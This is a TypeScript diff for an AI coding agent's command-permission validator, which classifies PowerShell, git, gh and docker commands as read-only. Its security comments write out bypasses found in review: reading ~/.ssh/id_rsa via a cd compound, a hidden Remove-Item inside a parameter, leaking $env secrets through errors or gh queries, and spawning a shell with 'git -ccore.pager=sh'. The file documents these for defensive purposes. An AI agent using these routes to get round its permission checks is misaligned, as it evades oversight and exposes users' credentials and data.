1113
+ const trimmed = command.trim()
1114
+ if (!trimmed) {
1115
+ return false
1116
+ }
1117
+
1118
+ // Subexpressions: $(...) can execute arbitrary code
1119
+ if (/\$\(/.test(trimmed)) {
1120
+ return true
1121
+ }
1122
+
1123
+ // Splatting: @variable passes arbitrary parameters. Real splatting is
1124
+ // token-start only — `@` preceded by whitespace/separator/start, not mid-word.
1125
+ // `[^\w.]` excludes word chars and `.` so `user@example.com` (email) and
1126
+ // `file.@{u}` don't match, but ` @splat` / `;@splat` / `^@splat` do.
1127
+ if (/(?:^|[^\w.])@\w+/.test(trimmed)) {
1128
+ return true
1129
+ }
1130
+
1131
+ // Member invocations: .Method() can call arbitrary .NET methods
1132
+ if (/\.\w+\s*\(/.test(trimmed)) {
1133
+ return true
1134
+ }
1135
+
1136
+ // Assignments: $var = ... can modify state
1137
+ if (/\$\w+\s*[+\-*/]?=/.test(trimmed)) {
1138
+ return true
1139
+ }
1140
+
1141
+ // Stop-parsing symbol: --% passes everything raw to native commands
1142
+ if (/--%/.test(trimmed)) {
1143
+ return true
1144
+ }
1145
+
1146
+ // UNC paths: \\server\share or //server/share can trigger network requests
1147
+ // and leak NTLM/Kerberos credentials
1148
+ // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() with atom search, short command strings
1149
+ if (/\\\\/.test(trimmed) || /(?<!:)\/\//.test(trimmed)) {
1150
+ return true
1151
+ }
1152
+
1153
+ // Static method calls: [Type]::Method() can invoke arbitrary .NET methods
1154
+ if (/::/.test(trimmed)) {
1155
+ return true
1156
+ }
1157
+
1158
+ return false
1159
+ }
1160
+
1161
+ /**
1162
+ * Checks if a PowerShell command is read-only based on the cmdlet allowlist.
1163
+ *
1164
+ * @param command - The original PowerShell command string
1165
+ * @param parsed - The AST-parsed representation of the command
1166
+ * @returns true if the command is read-only, false otherwise
1167
+ */
1168
+ export function isReadOnlyCommand(
1169
+ command: string,
1170
+ parsed?: ParsedPowerShellCommand,
1171
+ ): boolean {
1172
+ const trimmedCommand = command.trim()
1173
+ if (!trimmedCommand) {
1174
+ return false
1175
+ }
1176
+
1177
+ // If no parsed AST available, conservatively return false
1178
+ if (!parsed) {
1179
+ return false
1180
+ }
1181
+
1182
+ // If parsing failed, reject
1183
+ if (!parsed.valid) {
1184
+ return false
1185
+ }
1186
+
1187
+ const security = deriveSecurityFlags(parsed)
1188
+ // Reject commands with script blocks — we can't verify the code inside them
1189
+ // e.g., Get-Process | ForEach-Object { Remove-Item C:\foo } looks like a safe pipeline
1190
+ // but the script block contains destructive code
1191
+ if (
1192
+ security.hasScriptBlocks ||
1193
+ security.hasSubExpressions ||
1194
+ security.hasExpandableStrings ||
1195
+ security.hasSplatting ||
1196
+ security.hasMemberInvocations ||
1197
+ security.hasAssignments ||
1198
+ security.hasStopParsing
1199
+ ) {
1200
+ return false
1201
+ }
1202
+
1203
+ const segments = getPipelineSegments(parsed)
1204
+
1205
+ if (segments.length === 0) {
1206
+ return false
1207
+ }
1208
+
1209
+ // SECURITY: Block compound commands that contain a cwd-changing cmdlet
1210
+ // (Set-Location/Push-Location/Pop-Location/New-PSDrive) alongside any other
1211
+ // statement. This was previously scoped to cd+git only, but that overlooked
1212
+ // the isReadOnlyCommand auto-allow path for cd+read compounds (finding #27):
1213
+ // Set-Location ~; Get-Content ./.ssh/id_rsa
1214
+ // Both cmdlets are in CMDLET_ALLOWLIST, so without this guard the compound
1215
+ // auto-allows. Path validation resolved ./.ssh/id_rsa against the STALE
1216
+ // validator cwd (e.g. /project), missing any Read(~/.ssh/**) deny rule.
1217
+ // At runtime PowerShell cd's to ~, reads ~/.ssh/id_rsa.
1218
+ //
1219
+ // Any compound containing a cwd-changing cmdlet cannot be auto-classified
1220
+ // read-only when other statements may use relative paths — those paths
1221
+ // resolve differently at runtime than at validation time. BashTool has the
1222
+ // equivalent guard via compoundCommandHasCd threading into path validation.
1223
+ const totalCommands = segments.reduce(
1224
+ (sum, seg) => sum + seg.commands.length,
1225
+ 0,
1226
+ )
1227
+ if (totalCommands > 1) {
1228
+ const hasCd = segments.some(seg =>
1229
+ seg.commands.some(cmd => isCwdChangingCmdlet(cmd.name)),
1230
+ )
1231
+ if (hasCd) {
1232
+ return false
1233
+ }
1234
+ }
1235
+
1236
+ // Check each statement individually - all must be read-only
1237
+ for (const pipeline of segments) {
1238
+ if (!pipeline || pipeline.commands.length === 0) {
1239
+ return false
1240
+ }
1241
+
1242
+ // Reject file redirections (writing to files). `> $null` discards output
1243
+ // and is not a filesystem write, so it doesn't disqualify read-only status.
1244
+ if (pipeline.redirections.length > 0) {
1245
+ const hasFileRedirection = pipeline.redirections.some(
1246
+ r => !r.isMerging && !isNullRedirectionTarget(r.target),
1247
+ )
1248
+ if (hasFileRedirection) {
1249
+ return false
1250
+ }
1251
+ }
1252
+
1253
+ // First command must be in the allowlist
1254
+ const firstCmd = pipeline.commands[0]
1255
+ if (!firstCmd) {
1256
+ return false
1257
+ }
1258
+
1259
+ if (!isAllowlistedCommand(firstCmd, command)) {
1260
+ return false
1261
+ }
1262
+
1263
+ // Remaining pipeline commands must be safe output cmdlets OR allowlisted
1264
+ // (with arg validation). Format-Table/Measure-Object moved from
1265
+ // SAFE_OUTPUT_CMDLETS to CMDLET_ALLOWLIST after security review found all
1266
+ // accept calculated-property hashtables. isAllowlistedCommand runs their
1267
+ // argLeaksValue callback: bare `| Format-Table` passes, `| Format-Table
1268
+ // $env:SECRET` fails. SECURITY: nameType gate catches 'scripts\\Out-Null'
1269
+ // (raw name has path chars → 'application'). cmd.name is stripped to
1270
+ // 'Out-Null' which would match SAFE_OUTPUT_CMDLETS, but PowerShell runs
1271
+ // scripts\\Out-Null.ps1.
1272
+ for (let i = 1; i < pipeline.commands.length; i++) {
1273
+ const cmd = pipeline.commands[i]
1274
+ if (!cmd || cmd.nameType === 'application') {
1275
+ return false
1276
+ }
1277
+ // SECURITY: isSafeOutputCommand is name-only; only short-circuit for
1278
+ // zero-arg invocations. Out-String -InputObject:(rm x) — the paren is
1279
+ // evaluated when Out-String runs. With name-only check and args, the
1280
+ // colon-bound paren bypasses. Force isAllowlistedCommand (arg validation)
1281
+ // when args present — Out-String/Out-Null/Out-Host are NOT in
1282
+ // CMDLET_ALLOWLIST so any args will reject.
1283
+ // PoC: Get-Process | Out-String -InputObject:(Remove-Item /tmp/x)
1284
+ // → auto-allow → Remove-Item runs.
1285
+ if (isSafeOutputCommand(cmd.name) && cmd.args.length === 0) {
1286
+ continue
1287
+ }
1288
+ if (!isAllowlistedCommand(cmd, command)) {
1289
+ return false
1290
+ }
1291
+ }
1292
+
1293
+ // SECURITY: Reject statements with nested commands. nestedCommands are
1294
+ // CommandAst nodes found inside script block arguments, ParenExpressionAst
1295
+ // children of colon-bound parameters, or other non-top-level positions.
1296
+ // A statement with nestedCommands is by definition not a simple read-only
1297
+ // invocation — it contains executable sub-pipelines that bypass the
1298
+ // per-command allowlist check above.
1299
+ if (pipeline.nestedCommands && pipeline.nestedCommands.length > 0) {
1300
+ return false
1301
+ }
1302
+ }
1303
+
1304
+ return true
1305
+ }
1306
+
1307
+ /**
1308
+ * Checks if a single command element is in the allowlist and passes flag validation.
1309
+ */
1310
+ export function isAllowlistedCommand(
1311
+ cmd: ParsedCommandElement,
1312
+ originalCommand: string,
1313
+ ): boolean {
1314
+ // SECURITY: nameType is computed from the raw (pre-stripModulePrefix) name.
1315
+ // 'application' means the raw name contains path chars (. \\ /) — e.g.
1316
+ // 'scripts\\Get-Process', './git', 'node.exe'. PowerShell resolves these as
1317
+ // file paths, not as the cmdlet/command the stripped name matches. Never
1318
+ // auto-allow: the allowlist was built for cmdlets, not arbitrary scripts.
1319
+ // Known collateral: 'Microsoft.PowerShell.Management\\Get-ChildItem' also
1320
+ // classifies as 'application' (contains . and \\) and will prompt. Acceptable
1321
+ // since module-qualified names are rare in practice and prompting is safe.
1322
+ if (cmd.nameType === 'application') {
1323
+ // Bypass for explicit safe .exe names (bash `which` parity — see
1324
+ // SAFE_EXTERNAL_EXES). SECURITY: match the raw first token of cmd.text,
1325
+ // not cmd.name. stripModulePrefix collapses scripts\where.exe →
1326
+ // cmd.name='where.exe', but cmd.text preserves 'scripts\where.exe ...'.
1327
+ const rawFirstToken = cmd.text.split(/\s/, 1)[0]?.toLowerCase() ?? ''
1328
+ if (!SAFE_EXTERNAL_EXES.has(rawFirstToken)) {
1329
+ return false
1330
+ }
1331
+ // Fall through to lookupAllowlist — CMDLET_ALLOWLIST['where.exe'] handles
1332
+ // flag validation (empty config = all flags OK, matching bash's `which`).
1333
+ }
1334
+
1335
+ const config = lookupAllowlist(cmd.name)
1336
+ if (!config) {
1337
+ return false
1338
+ }
1339
+
1340
+ // If there's a regex constraint, check it against the original command
1341
+ if (config.regex && !config.regex.test(originalCommand)) {
1342
+ return false
1343
+ }
1344
+
1345
+ // If there's an additional callback, check it
1346
+ if (config.additionalCommandIsDangerousCallback?.(originalCommand, cmd)) {
1347
+ return false
1348
+ }
1349
+
1350
+ // SECURITY: whitelist arg elementTypes — only StringConstant and Parameter
1351
+ // are statically verifiable. Everything else expands/evaluates at runtime:
1352
+ // 'Variable' → `Get-Process $env:AWS_SECRET_ACCESS_KEY` expands,
1353
+ // errors "Cannot find process 'sk-ant-...'", model
1354
+ // reads the secret from the error
1355
+ // 'Other' (Hashtable) → `Get-Process @{k=$env:SECRET}` same leak
1356
+ // 'Other' (Convert) → `Get-Process [string]$env:SECRET` same leak
1357
+ // 'Other' (BinaryExpr)→ `Get-Process ($env:SECRET + '')` same leak
1358
+ // 'SubExpression' → arbitrary code (already caught by deriveSecurityFlags
1359
+ // at the isReadOnlyCommand layer, but isAllowlistedCommand
1360
+ // is also called from checkPermissionMode directly)
1361
+ // hasSyncSecurityConcerns misses bare $var (only matches `$(`/@var/.Method(/
1362
+ // $var=/--%/::); deriveSecurityFlags has no 'Variable' case; the safeFlags
1363
+ // loop below validates flag NAMES but not positional arg TYPES. File cmdlets
1364
+ // (CMDLET_PATH_CONFIG) are already protected by SAFE_PATH_ELEMENT_TYPES in
1365
+ // pathValidation.ts — this closes the gap for non-file cmdlets (Get-Process,
1366
+ // Get-Service, Get-Command, ~15 others). PS equivalent of Bash's blanket `$`
1367
+ // token check at BashTool/readOnlyValidation.ts:~1356.
1368
+ //
1369
+ // Placement: BEFORE external-command dispatch so git/gh/docker/dotnet get
1370
+ // this too (defense-in-depth with their string-based `$` checks; catches
1371
+ // @{...}/[cast]/($a+$b) that `$` substring misses). In PS argument mode,
1372
+ // bare `5` tokenizes as StringConstant (BareWord), not a numeric literal,
1373
+ // so `git log -n 5` passes.
1374
+ //
1375
+ // SECURITY: elementTypes undefined → fail-closed. The real parser always
1376
+ // sets it (parser.ts:769/781/812), so undefined means an untrusted or
1377
+ // malformed element. Previously skipped (fail-open) for test-helper
1378
+ // convenience; test helpers now set elementTypes explicitly.
1379
+ // elementTypes[0] is the command name; args start at elementTypes[1].
1380
+ if (!cmd.elementTypes) {
1381
+ return false
1382
+ }
1383
+ {
1384
+ for (let i = 1; i < cmd.elementTypes.length; i++) {
1385
+ const t = cmd.elementTypes[i]
1386
+ if (t !== 'StringConstant' && t !== 'Parameter') {
1387
+ // ArrayLiteralAst (`Get-Process Name, Id`) maps to 'Other'. The
1388
+ // leak vectors enumerated above all have a metachar in their extent
1389
+ // text: Hashtable `@{`, Convert `[`, BinaryExpr-with-var `$`,
1390
+ // ParenExpr `(`. A bare comma-list of identifiers has none.
1391
+ if (!/[$(@{[]/.test(cmd.args[i - 1] ?? '')) {
1392
+ continue
1393
+ }
1394
+ return false
1395
+ }
1396
+ // Colon-bound parameter (`-Flag:$env:SECRET`) is a SINGLE
1397
+ // CommandParameterAst — the VariableExpressionAst is its .Argument
1398
+ // child, not a separate CommandElement, so elementTypes says 'Parameter'
1399
+ // and the whitelist above passes.
1400
+ //
1401
+ // Query the parser's children[] tree instead of doing
1402
+ // string-archaeology on the arg text. children[i-1] holds the
1403
+ // .Argument child's mapped type (aligned with args[i-1]).
1404
+ // Tree query catches MORE than the string check — e.g.
1405
+ // `-InputObject:@{k=v}` (HashtableAst → 'Other', no `$` in text),
1406
+ // `-Name:('payload' > file)` (ParenExpressionAst with redirection).
1407
+ // Fallback to the extended metachar check when children is undefined
1408
+ // (backward compat / test helpers that don't set it).
1409
+ if (t === 'Parameter') {
1410
+ const paramChildren = cmd.children?.[i - 1]
1411
+ if (paramChildren) {
1412
+ if (paramChildren.some(c => c.type !== 'StringConstant')) {
1413
+ return false
1414
+ }
1415
+ } else {
1416
+ // Fallback: string-archaeology on arg text (pre-children parsers).
1417
+ // Reject `$` (variable), `(` (ParenExpressionAst), `@` (hash/array
1418
+ // sub), `{` (scriptblock), `[` (type literal/static method).
1419
+ const arg = cmd.args[i - 1] ?? ''
1420
+ const colonIdx = arg.indexOf(':')
1421
+ if (colonIdx > 0 && /[$(@{[]/.test(arg.slice(colonIdx + 1))) {
1422
+ return false
1423
+ }
1424
+ }
1425
+ }
1426
+ }
1427
+ }
1428
+
1429
+ const canonical = resolveToCanonical(cmd.name)
1430
+
1431
+ // Handle external commands via shared validation
1432
+ if (
1433
+ canonical === 'git' ||
1434
+ canonical === 'gh' ||
1435
+ canonical === 'docker' ||
1436
+ canonical === 'dotnet'
1437
+ ) {
1438
+ return isExternalCommandSafe(canonical, cmd.args)
1439
+ }
1440
+
1441
+ // On Windows, / is a valid flag prefix for native commands (e.g., findstr /S).
1442
+ // But PowerShell cmdlets always use - prefixed parameters, so /tmp is a path,
1443
+ // not a flag. We detect cmdlets by checking if the command resolves to a
1444
+ // Verb-Noun canonical name (either directly or via alias).
1445
+ const isCmdlet = canonical.includes('-')
1446
+
1447
+ // SECURITY: if allowAllFlags is set, skip flag validation (command's entire
1448
+ // flag surface is read-only). Otherwise, missing/empty safeFlags means
1449
+ // "positional args only, reject all flags" — NOT "accept everything".
1450
+ if (config.allowAllFlags) {
1451
+ return true
1452
+ }
1453
+ if (!config.safeFlags || config.safeFlags.length === 0) {
1454
+ // No safeFlags defined and allowAllFlags not set: reject any flags.
1455
+ // Positional-only args are still allowed (the loop below won't fire).
1456
+ // This is the safe default — commands must opt in to flag acceptance.
1457
+ const hasFlags = cmd.args.some((arg, i) => {
1458
+ if (isCmdlet) {
1459
+ return isPowerShellParameter(arg, cmd.elementTypes?.[i + 1])
1460
+ }
1461
+ return (
1462
+ arg.startsWith('-') ||
1463
+ (process.platform === 'win32' && arg.startsWith('/'))
1464
+ )
1465
+ })
1466
+ return !hasFlags
1467
+ }
1468
+
1469
+ // Validate that all flags used are in the allowlist.
1470
+ // SECURITY: use elementTypes as ground
1471
+ // truth for parameter detection. PowerShell's tokenizer accepts en-dash/
1472
+ // em-dash/horizontal-bar (U+2013/2014/2015) as parameter prefixes; a raw
1473
+ // startsWith('-') check misses `–ComputerName` (en-dash). The parser maps
1474
+ // CommandParameterAst → 'Parameter' regardless of dash char.
1475
+ // elementTypes[0] is the name element; args start at elementTypes[1].
1476
+ for (let i = 0; i < cmd.args.length; i++) {
1477
+ const arg = cmd.args[i]!
1478
+ // For cmdlets: trust elementTypes (AST ground truth, catches Unicode dashes).
1479
+ // For native exes on Windows: also check `/` prefix (argv convention, not
1480
+ // tokenizer — the parser sees `/S` as a positional, not CommandParameterAst).
1481
+ const isFlag = isCmdlet
1482
+ ? isPowerShellParameter(arg, cmd.elementTypes?.[i + 1])
1483
+ : arg.startsWith('-') ||
1484
+ (process.platform === 'win32' && arg.startsWith('/'))
1485
+ if (isFlag) {
1486
+ // For cmdlets, normalize Unicode dash to ASCII hyphen for safeFlags
1487
+ // comparison (safeFlags entries are always written with ASCII `-`).
1488
+ // Native-exe safeFlags are stored with `/` (e.g. '/FO') — don't touch.
1489
+ let paramName = isCmdlet ? '-' + arg.slice(1) : arg
1490
+ const colonIndex = paramName.indexOf(':')
1491
+ if (colonIndex > 0) {
1492
+ paramName = paramName.substring(0, colonIndex)
1493
+ }
1494
+
1495
+ // -ErrorAction/-Verbose/-Debug etc. are accepted by every cmdlet via
1496
+ // [CmdletBinding()] and only route error/warning/progress streams —
1497
+ // they can't make a read-only cmdlet write. pathValidation.ts already
1498
+ // merges these into its per-cmdlet param sets (line ~1339); this is
1499
+ // the same merge for safeFlags. Without it, `Get-Content file.txt
1500
+ // -ErrorAction SilentlyContinue` prompts despite Get-Content being
1501
+ // allowlisted. Only for cmdlets — native exes don't have common params.
1502
+ const paramLower = paramName.toLowerCase()
1503
+ if (isCmdlet && COMMON_PARAMETERS.has(paramLower)) {
1504
+ continue
1505
+ }
1506
+ const isSafe = config.safeFlags.some(
1507
+ flag => flag.toLowerCase() === paramLower,
1508
+ )
1509
+ if (!isSafe) {
1510
+ return false
1511
+ }
1512
+ }
1513
+ }
1514
+
1515
+ return true
1516
+ }
1517
+
1518
+ // ---------------------------------------------------------------------------
1519
+ // External command validation (git, gh, docker) using shared configs
1520
+ // ---------------------------------------------------------------------------
1521
+
1522
+ function isExternalCommandSafe(command: string, args: string[]): boolean {
1523
+ switch (command) {
1524
+ case 'git':
1525
+ return isGitSafe(args)
1526
+ case 'gh':
1527
+ return isGhSafe(args)
1528
+ case 'docker':
1529
+ return isDockerSafe(args)
1530
+ case 'dotnet':
1531
+ return isDotnetSafe(args)
1532
+ default:
1533
+ return false
1534
+ }
1535
+ }
1536
+
1537
+ const DANGEROUS_GIT_GLOBAL_FLAGS = new Set([
1538
+ '-c',
1539
+ '-C',
1540
+ '--exec-path',
1541
+ '--config-env',
1542
+ '--git-dir',
1543
+ '--work-tree',
1544
+ // SECURITY: --attr-source creates a parser differential. Git treats the
1545
+ // token after the tree-ish value as a pathspec (not the subcommand), but
1546
+ // our skip-by-2 loop would treat it as the subcommand:
1547
+ // git --attr-source HEAD~10 log status
1548
+ // validator: advances past HEAD~10, sees subcmd=log → allow
1549
+ // git: consumes `log` as pathspec, runs `status` as the real subcmd
1550
+ // Verified with `GIT_TRACE=1 git --attr-source HEAD~10 log status` →
1551
+ // `trace: built-in: git status`. Reject outright rather than skip-by-2.
1552
+ '--attr-source',
1553
+ ])
1554
+
1555
+ // Git global flags that accept a separate (space-separated) value argument.
1556
+ // When the loop encounters one without an inline `=` value, it must skip the
1557
+ // next token so the value isn't mistaken for the subcommand.
1558
+ //
1559
+ // SECURITY: This set must be COMPLETE. Any value-consuming global flag not
1560
+ // listed here creates a parser differential: validator sees the value as the
1561
+ // subcommand, git consumes it and runs the NEXT token. Audited against
1562
+ // `man git` + GIT_TRACE for git 2.51; --list-cmds is `=`-only, booleans
1563
+ // (-p/--bare/--no-*/--*-pathspecs/--html-path/etc.) advance by 1 via the
1564
+ // default path. --attr-source REMOVED: it also triggers pathspec parsing,
1565
+ // creating a second differential — moved to DANGEROUS_GIT_GLOBAL_FLAGS above.
1566
+ const GIT_GLOBAL_FLAGS_WITH_VALUES = new Set([
1567
+ '-c',
1568
+ '-C',
1569
+ '--exec-path',
1570
+ '--config-env',
1571
+ '--git-dir',
1572
+ '--work-tree',
1573
+ '--namespace',
1574
+ '--super-prefix',
1575
+ '--shallow-file',
1576
+ ])
1577
+
1578
+ // Git short global flags that accept attached-form values (no space between
1579
+ // flag letter and value). Long options (--git-dir etc.) require `=` or space,
1580
+ // so the split-on-`=` check handles them. But `-ccore.pager=sh` and `-C/path`
1581
+ // need prefix matching: git parses `-c<name>=<value>` and `-C<path>` directly.
1582
+ const DANGEROUS_GIT_SHORT_FLAGS_ATTACHED = ['-c', '-C']
1583
+
1584
+ function isGitSafe(args: string[]): boolean {
1585
+ if (args.length === 0) {
1586
+ return true
1587
+ }
1588
+
1589
+ // SECURITY: Reject any arg containing `$` (variable reference). Bare
1590
+ // VariableExpressionAst positionals reach here as literal text ($env:SECRET,
1591
+ // $VAR). deriveSecurityFlags does not gate bare Variable args. The validator
1592
+ // sees `$VAR` as text; PowerShell expands it at runtime. Parser differential:
1593
+ // git diff $VAR where $VAR = '--output=/tmp/evil'
1594
+ // → validator sees positional '$VAR' → validateFlags passes
1595
+ // → PowerShell runs `git diff --output=/tmp/evil` → file write
1596
+ // This generalizes the ls-remote inline `$` guard below to all git subcommands.
1597
+ // Bash equivalent: BashTool blanket
1598
+ // `$` rejection at readOnlyValidation.ts:~1352. isGhSafe has the same guard.
1599
+ for (const arg of args) {
1600
+ if (arg.includes('$')) {
1601
+ return false
1602
+ }
1603
+ }
1604
+
1605
+ // Skip over global flags before the subcommand, rejecting dangerous ones.
1606
+ // Flags that take space-separated values must consume the next token so it
1607
+ // isn't mistaken for the subcommand (e.g. `git --namespace foo status`).
1608
+ let idx = 0
1609
+ while (idx < args.length) {
1610
+ const arg = args[idx]
1611
+ if (!arg || !arg.startsWith('-')) {
1612
+ break
1613
+ }
1614
+ // SECURITY: Attached-form short flags. `-ccore.pager=sh` splits on `=` to
1615
+ // `-ccore.pager`, which isn't in DANGEROUS_GIT_GLOBAL_FLAGS. Git accepts
1616
+ // `-c<name>=<value>` and `-C<path>` with no space. We must prefix-match.
1617
+ // Note: `--cached`, `--config-env`, etc. already fail startsWith('-c') at
1618
+ // position 1 (`-` ≠ `c`). The `!== '-'` guard only applies to `-c`
1619
+ // (git config keys never start with `-`, so `-c-key` is implausible).
1620
+ // It does NOT apply to `-C` — directory paths CAN start with `-`, so
1621
+ // `git -C-trap status` must reject. `git -ccore.pager=sh log` spawns a shell.
1622
+ for (const shortFlag of DANGEROUS_GIT_SHORT_FLAGS_ATTACHED) {
1623
+ if (
1624
+ arg.length > shortFlag.length &&
1625
+ arg.startsWith(shortFlag) &&
1626
+ (shortFlag === '-C' || arg[shortFlag.length] !== '-')
1627
+ ) {
1628
+ return false
1629
+ }
1630
+ }
1631
+ const hasInlineValue = arg.includes('=')
1632
+ const flagName = hasInlineValue ? arg.split('=')[0] || '' : arg
1633
+ if (DANGEROUS_GIT_GLOBAL_FLAGS.has(flagName)) {
1634
+ return false
1635
+ }
1636
+ // Consume the next token if the flag takes a separate value
1637
+ if (!hasInlineValue && GIT_GLOBAL_FLAGS_WITH_VALUES.has(flagName)) {
1638
+ idx += 2
1639
+ } else {
1640
+ idx++
1641
+ }
1642
+ }
1643
+
1644
+ if (idx >= args.length) {
1645
+ return true
1646
+ }
1647
+
1648
+ // Try multi-word subcommand first (e.g. 'stash list', 'config --get', 'remote show')
1649
+ const first = args[idx]?.toLowerCase() || ''
1650
+ const second = idx + 1 < args.length ? args[idx + 1]?.toLowerCase() || '' : ''
1651
+
1652
+ // GIT_READ_ONLY_COMMANDS keys are like 'git diff', 'git stash list'
1653
+ const twoWordKey = `git ${first} ${second}`
1654
+ const oneWordKey = `git ${first}`
1655
+
1656
+ let config: ExternalCommandConfig | undefined =
1657
+ GIT_READ_ONLY_COMMANDS[twoWordKey]
1658
+ let subcommandTokens = 2
1659
+
1660
+ if (!config) {
1661
+ config = GIT_READ_ONLY_COMMANDS[oneWordKey]
1662
+ subcommandTokens = 1
1663
+ }
1664
+
1665
+ if (!config) {
1666
+ return false
1667
+ }
1668
+
1669
+ const flagArgs = args.slice(idx + subcommandTokens)
1670
+
1671
+ // git ls-remote URL rejection — ported from BashTool's inline guard
1672
+ // (src/tools/BashTool/readOnlyValidation.ts:~962). ls-remote with a URL
1673
+ // is a data-exfiltration vector (encode secrets in hostname → DNS/HTTP).
1674
+ // Reject URL-like positionals: `://` (http/git protocols), `@` + `:` (SSH
1675
+ // git@host:path), and `$` (variable refs — $env:URL reaches here as the
1676
+ // literal string '$env:URL' when the arg's elementType is Variable; the
1677
+ // security-flag checks don't gate bare Variable positionals passed to
1678
+ // external commands).
1679
+ if (first === 'ls-remote') {
1680
+ for (const arg of flagArgs) {
1681
+ if (!arg.startsWith('-')) {
1682
+ if (
1683
+ arg.includes('://') ||
1684
+ arg.includes('@') ||
1685
+ arg.includes(':') ||
1686
+ arg.includes('$')
1687
+ ) {
1688
+ return false
1689
+ }
1690
+ }
1691
+ }
1692
+ }
1693
+
1694
+ if (
1695
+ config.additionalCommandIsDangerousCallback &&
1696
+ config.additionalCommandIsDangerousCallback('', flagArgs)
1697
+ ) {
1698
+ return false
1699
+ }
1700
+ return validateFlags(flagArgs, 0, config, { commandName: 'git' })
1701
+ }
1702
+
1703
+ function isGhSafe(args: string[]): boolean {
1704
+ // gh commands are network-dependent; only allow for ant users
1705
+ if (process.env.USER_TYPE !== 'ant') {
1706
+ return false
1707
+ }
1708
+
1709
+ if (args.length === 0) {
1710
+ return true
1711
+ }
1712
+
1713
+ // Try two-word subcommand first (e.g. 'pr view')
1714
+ let config: ExternalCommandConfig | undefined
1715
+ let subcommandTokens = 0
1716
+
1717
+ if (args.length >= 2) {
1718
+ const twoWordKey = `gh ${args[0]?.toLowerCase()} ${args[1]?.toLowerCase()}`
1719
+ config = GH_READ_ONLY_COMMANDS[twoWordKey]
1720
+ subcommandTokens = 2
1721
+ }
1722
+
1723
+ // Try single-word subcommand (e.g. 'gh version')
1724
+ if (!config && args.length >= 1) {
1725
+ const oneWordKey = `gh ${args[0]?.toLowerCase()}`
1726
+ config = GH_READ_ONLY_COMMANDS[oneWordKey]
1727
+ subcommandTokens = 1
1728
+ }
1729
+
1730
+ if (!config) {
1731
+ return false
1732
+ }
1733
+
1734
+ const flagArgs = args.slice(subcommandTokens)
1735
+
1736
+ // SECURITY: Reject any arg containing `$` (variable reference). Bare
1737
+ // VariableExpressionAst positionals reach here as literal text ($env:SECRET).
1738
+ // deriveSecurityFlags does not gate bare Variable args — only subexpressions,
1739
+ // splatting, expandable strings, etc. All gh subcommands are network-facing,
1740
+ // so a variable arg is a data-exfiltration vector:
1741
+ // gh search repos $env:SECRET_API_KEY
1742
+ // → PowerShell expands at runtime → secret sent to GitHub API.
1743
+ // git ls-remote has an equivalent inline guard; this generalizes it for gh.
1744
+ // Bash equivalent: BashTool blanket `$` rejection at readOnlyValidation.ts:~1352.
1745
+ for (const arg of flagArgs) {
1746
+ if (arg.includes('$')) {
1747
+ return false
1748
+ }
1749
+ }
1750
+ if (
1751
+ config.additionalCommandIsDangerousCallback &&
1752
+ config.additionalCommandIsDangerousCallback('', flagArgs)
1753
+ ) {
1754
+ return false
1755
+ }
1756
+ return validateFlags(flagArgs, 0, config)
1757
+ }
1758
+
1759
+ function isDockerSafe(args: string[]): boolean {
1760
+ if (args.length === 0) {
1761
+ return true
1762
+ }
1763
+
1764
+ // SECURITY: blanket PowerShell `$` variable rejection. Same guard as
1765
+ // isGitSafe and isGhSafe. Parser differential: validator sees literal
1766
+ // '$env:X'; PowerShell expands at runtime. Runs BEFORE the fast-path
1767
+ // return — the previous location (after fast-path) never fired for
1768
+ // `docker ps`/`docker images`. The earlier comment claiming those take no
1769
+ // --format was wrong: `docker ps --format $env:AWS_SECRET_ACCESS_KEY`
1770
+ // auto-allowed, PowerShell expanded, docker errored with the secret in
1771
+ // its output, model read it. Check ALL args, not flagArgs — args[0]
1772
+ // (subcommand slot) could also be `$env:X`. elementTypes whitelist isn't
1773
+ // applicable here: this function receives string[] (post-stringify), not
1774
+ // ParsedCommandElement; the isAllowlistedCommand caller applies the
1775
+ // elementTypes gate one layer up.
1776
+ for (const arg of args) {
1777
+ if (arg.includes('$')) {
1778
+ return false
1779
+ }
1780
+ }
1781
+
1782
+ const oneWordKey = `docker ${args[0]?.toLowerCase()}`
1783
+
1784
+ // Fast path: EXTERNAL_READONLY_COMMANDS entries ('docker ps', 'docker images')
1785
+ // have no flag constraints — allow unconditionally (after $ guard above).
1786
+ if (EXTERNAL_READONLY_COMMANDS.includes(oneWordKey)) {
1787
+ return true
1788
+ }
1789
+
1790
+ // DOCKER_READ_ONLY_COMMANDS entries ('docker logs', 'docker inspect') have
1791
+ // per-flag configs. Mirrors isGhSafe: look up config, then validateFlags.
1792
+ const config: ExternalCommandConfig | undefined =
1793
+ DOCKER_READ_ONLY_COMMANDS[oneWordKey]
1794
+ if (!config) {
1795
+ return false
1796
+ }
1797
+
1798
+ const flagArgs = args.slice(1)
1799
+
1800
+ if (
1801
+ config.additionalCommandIsDangerousCallback &&
1802
+ config.additionalCommandIsDangerousCallback('', flagArgs)
1803
+ ) {
1804
+ return false
1805
+ }
1806
+ return validateFlags(flagArgs, 0, config)
1807
+ }
1808
+
1809
+ function isDotnetSafe(args: string[]): boolean {
1810
+ if (args.length === 0) {
1811
+ return false
1812
+ }
1813
+
1814
+ // dotnet uses top-level flags like --version, --info, --list-runtimes
1815
+ // All args must be in the safe set
1816
+ for (const arg of args) {
1817
+ if (!DOTNET_READ_ONLY_FLAGS.has(arg.toLowerCase())) {
1818
+ return false
1819
+ }
1820
+ }
1821
+
1822
+ return true
1823
+ }